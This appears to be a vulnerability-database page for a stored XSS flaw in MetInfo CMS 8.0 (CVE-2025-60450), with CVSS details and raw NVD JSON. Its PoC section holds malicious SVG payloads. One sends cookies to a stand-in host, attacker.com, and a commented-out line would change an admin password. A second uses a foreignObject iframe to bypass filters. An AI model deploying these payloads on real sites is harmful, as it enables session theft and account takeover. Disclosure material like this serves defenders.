Security Vulnerability Report
中文
CVE-2025-60450 CVSS 6.1 MEDIUM

CVE-2025-60450

Published: 2025-10-03 14:15:47
Last Modified: 2025-10-07 15:36:39
Source: [email protected]

Description

A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists due to insufficient validation and sanitization of SVG file uploads in the app\system\include\module\editor\Uploader.class.php component. This security flaw allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:* - VULNERABLE
MetInfo CMS 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-60450 PoC: Stored XSS via Malicious SVG Upload in MetInfo CMS 8.0 --> <!-- Save the following content as evil.svg and upload via MetInfo CMS editor --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.cookie)"> <script type="text/javascript"> // Malicious JavaScript payload // Steal cookies and send to attacker server var cookie = document.cookie; var img = new Image(); img.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookie); // Or perform actions on behalf of the user // fetch('/admin/api/change-password', {method: 'POST', body: JSON.stringify({new_password: 'hacked'})}); </script> <rect x="0" y="0" width="100" height="100" fill="red"/> <text x="10" y="50" font-size="14" fill="white">Evil SVG</text> </svg> <!-- Alternative PoC using foreignObject to bypass some filters --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject width="200" height="200"> <body xmlns="http://www.w3.org/1999/xhtml"> <iframe src="javascript:alert('XSS')"></iframe> </body> </foreignObject> </svg>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60450", "sourceIdentifier": "[email protected]", "published": "2025-10-03T14:15:46.543", "lastModified": "2025-10-07T15:36:38.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-Site Scripting (XSS) vulnerability has been discovered in MetInfo CMS version 8.0. The vulnerability exists due to insufficient validation and sanitization of SVG file uploads in the app\\system\\include\\module\\editor\\Uploader.class.php component. This security flaw allows attackers to upload malicious SVG files containing JavaScript code that executes when the uploaded file is viewed or accessed."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:metinfo:metinfo:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "A86CC57E-FD95-43D3-A9CE-1153FC3C8684"}]}]}], "references": [{"url": "https://snowhy77.github.io/2025/08/22/Stored-XSS-Vulnerability-in-MetInfo-via-SVG-Upload/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.